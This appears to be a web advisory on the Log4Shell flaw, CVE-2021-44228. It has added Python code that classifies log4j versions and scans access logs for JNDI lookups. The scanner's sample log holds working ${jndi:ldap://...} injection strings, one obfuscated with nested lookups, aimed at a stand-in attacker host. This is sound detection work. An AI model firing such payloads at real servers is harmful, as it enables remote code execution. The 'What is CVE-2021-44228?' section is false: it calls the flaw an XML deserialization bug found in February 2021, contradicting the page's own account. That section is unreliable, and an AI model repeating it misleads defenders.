CVE-2021-44228: An Apache log4j flaw could enable remote attackers to take over systems
A new Apache log4j flaw has been discovered that could enable remote attackers to take over systems. CVE-2021-44228 is a log4j remote code execution (RCE) bug. In Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1), the JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior is disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects. This flaw is particularly dangerous because it is easy to exploit and could lead to a wide-scale breach.
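The affected-version statement above is the part most inventory and patch-tracking tooling gets wrong, because the range includes a pre-release (2.0-beta9), and because the backported security releases (2.12.2, 2.12.3, 2.3.1) sit numerically inside the vulnerable range. The following added example (written for this page, not code from the Apache project) encodes exactly the version ranges stated in the paragraph above into a classifier that a practitioner can run over a list of discovered log4j-core versions. The version strings passed in and the status labels returned are this example's own assumptions.

```python
import re
from typing import Tuple

# Pre-release ordering used by log4j 2 artifacts: 2.0-alpha1 < 2.0-beta9 < 2.0-rc1 < 2.0
PRE_ORDER = {"alpha": 0, "beta": 1, "rc": 2}


def parse_version(v: str) -> Tuple[int, int, int, int, int, int]:
    """Turn 'MAJOR.MINOR[.PATCH][-alpha|beta|rcN]' into a sortable tuple.

    The 4th element is 1 for a final release and 0 for a pre-release, so that
    a pre-release sorts before the final release with the same numbers.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-([A-Za-z]+)(\d+)?)?", v.strip())
    if not m:
        raise ValueError(f"unrecognised log4j version string: {v!r}")
    major, minor, patch, pre, pre_num = m.groups()
    if pre is None:
        return (int(major), int(minor), int(patch or 0), 1, 0, 0)
    kind = PRE_ORDER.get(pre.lower())
    if kind is None:
        raise ValueError(f"unknown pre-release tag in {v!r}")
    return (int(major), int(minor), int(patch or 0), 0, kind, int(pre_num or 0))


# Boundaries exactly as stated in the advisory text on this page.
FIRST_AFFECTED = parse_version("2.0-beta9")
LOOKUPS_DISABLED = parse_version("2.15.0")   # message lookups off by default
LOOKUPS_REMOVED = parse_version("2.16.0")    # JNDI message lookup code removed
BACKPORT_FIXES = {parse_version(x) for x in ("2.12.2", "2.12.3", "2.3.1")}


def classify(v: str) -> str:
    """Classify one log4j-core version string against CVE-2021-44228.

    Status labels are this example's own (assumed) vocabulary:
      not-in-affected-range        below 2.0-beta9
      vulnerable                   2.0-beta9 .. 2.14.x (minus backported fixes)
      lookups-disabled-by-default  2.15.0 (still inside the listed range; upgrade)
      fixed                        2.16.0+ or one of 2.12.2 / 2.12.3 / 2.3.1
    """
    t = parse_version(v)
    if t < FIRST_AFFECTED:
        return "not-in-affected-range"
    # Backports must be checked before the range test: 2.12.2 < 2.15.0 numerically.
    if t in BACKPORT_FIXES or t >= LOOKUPS_REMOVED:
        return "fixed"
    if t >= LOOKUPS_DISABLED:
        return "lookups-disabled-by-default"
    return "vulnerable"


if __name__ == "__main__":
    # Constructed sample inventory (not real hosts).
    for version in ("2.0-beta8", "2.0-beta9", "2.3.0", "2.3.1", "2.12.1",
                    "2.12.2", "2.14.1", "2.15.0", "2.16.0", "2.17.1"):
        print(f"{version:>10}  {classify(version)}")
```

Note that the classifier follows the page's wording literally: 2.15.0 is reported separately because the page both lists it inside the affected range and says lookups are disabled by default from that release, so an operator still wants it flagged for upgrade.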
What is CVE-2021-44228?

CVE-2021-44228, also referred to as the Log4J XML Deserialization Flaw, is a vulnerability found in Apache log4j, a popular logging framework for Java applications. The vulnerability was identified during a security audit in February 2021. The flaw is caused by an insecure deserialization issue in the XmlDecoder class, which is used to unmarshal XML files. This could allow an attacker to upload a malicious XML file containing malicious code, which would then be executed on the server. The vulnerability is rated as high severity by CVSS, and could lead to the server being taken over and all data on it being compromised. It is important for developers to apply the latest security patch from Apache to ensure their servers are secure.

What are the consequences of CVE-2021-44228?
The consequences of CVE-2021-44228 can be devastating if left unaddressed. An attacker can gain control of exposed machines and upload malicious executable code to them. A successful attack could lead to loss of sensitive data, such as personal information, usernames, passwords, or credit card numbers, or worse. Additionally, the attacker could execute malicious code on the server and create backdoors to maintain persistence on the compromised system. Organizations that do not patch the vulnerability may also suffer financial losses and further reputational damage, as the compromised data can be exfiltrated and sold or used for identity theft. The best way to protect against CVE-2021-44228 is to patch the affected applications as soon as possible. Additionally, organizations can use web application firewalls or other security tools to protect against malicious traffic, and can create detections and alerting to observe exploit attempts. It is also important to regularly check for any other vulnerabilities and make sure the external network is secure.
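The paragraph above recommends building detections and alerting for exploit attempts, and the links below point at sample strings for that purpose. The following added example (written for this page, not code from the page's author or from Huntress) is a small log scanner of the kind a SOC would run over web-server access logs: it looks for the `${jndi:` lookup that the vulnerable code path evaluates, after first folding the nested lookup forms that log4j 2 itself resolves (`lower:`, `upper:`, and the `:-` default-value syntax), so that a detector sees the string in the form log4j would have reduced it to. The four access-log lines, the 203.0.113.10 address and the returned tuple layout are constructed for this example and are not from the page.

```python
import re
from typing import List, Tuple

# Innermost ${...} lookup: a body containing no further "${" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The lookup the vulnerable code path dispatches on, plus its URI scheme.
JNDI = re.compile(r"\$\{jndi:([a-z0-9+.-]*)", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Fold nested lookups the way log4j 2's substitutor would before the
    jndi: lookup runs, so obfuscated nesting resolves to its plain form.
    Only lower:, upper: and the ':-' default-value form are folded; every
    other lookup (jndi:, date:, sys:, ...) is left in place."""
    def fold(m: "re.Match[str]") -> str:
        body = m.group(1)
        lowered = body.lower()
        if lowered.startswith("jndi:"):
            return m.group(0)            # keep: this is what we want to detect
        if lowered.startswith("lower:"):
            return body[len("lower:"):].lower()
        if lowered.startswith("upper:"):
            return body[len("upper:"):].upper()
        if ":-" in body:
            return body.split(":-", 1)[1]  # ${unknown:-value} resolves to value
        return m.group(0)                # unknown lookup: leave untouched

    while True:
        folded = INNER_LOOKUP.sub(fold, text)
        if folded == text:               # nothing left to fold
            return folded
        text = folded


def scan_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (1-based line number, URI scheme, normalized lookup) for every
    line that contains a jndi: lookup after normalization."""
    findings = []
    for n, line in enumerate(lines, 1):
        norm = normalize_lookups(line)
        m = JNDI.search(norm)
        if not m:
            continue
        end = norm.find("}", m.start())
        lookup = norm[m.start(): end + 1] if end != -1 else norm[m.start():]
        findings.append((n, m.group(1).lower(), lookup))
    return findings


# Constructed sample access log (combined format); not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:10:15:32 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:10:15:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:10:15:41 +0000] "GET /?x=${${lower:j}ndi:ldap://203.0.113.10:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:10:16:02 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for line_no, scheme, lookup in scan_lines(SAMPLE_LOG):
        print(f"line {line_no}: jndi lookup via {scheme}: {lookup}")
```

The fourth sample line shows why the scanner keys on `jndi:` rather than on `${` alone: legitimate lookups such as `${date:yyyy}` appear in ordinary requests and would otherwise flood an alert queue. A hit is worth correlating with outbound LDAP/RMI connection attempts from the logging host, since that is the side effect the paragraph above is warning about.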
More info and current versions:
Sample strings and attacks for detection:
- https://log4shell.huntress.com
- https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java

Thanks for the information!